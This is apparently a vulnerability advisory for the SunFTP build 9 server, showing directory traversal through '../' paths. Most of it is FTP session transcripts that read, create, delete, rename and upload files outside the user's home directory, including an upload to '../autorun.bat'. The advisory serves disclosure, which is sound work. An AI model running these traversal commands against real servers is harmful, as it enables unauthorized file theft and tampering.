Sunftp build9(1) - ftp server Vulnerability

[se00020 () LION CC]

It is possible to break out of the root directory by 
using relative paths

e:\crap was used as homedir. of user test.

#the get command#


getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 
179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 
1443000,00KB/s


#the mkdir command#


without priv. to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.

hell!it's getting worse...


#the rmdir command#


without any priv. to remove anything

ftp> rmdir ../test
250 '/../test': directory removed.

this only works with empty directories


#the rename command#

it is possible to rename files outside of the root 
directory without 
permissions.And it is also possible to move files with 
the rename command,
when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 
grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 
240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed 
to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 
grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 
314000,00KB/s


#the put command#

If you have permission to upload files, you can put 
these files outside of 
the homedir.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 
grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 
314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok



Solution

no quick bugfix. Use with care 

I tried to contact the authors, but their webpage 
seems to be down.

se00020 () lion cc or
se00020 () fhs-hagenberg ac at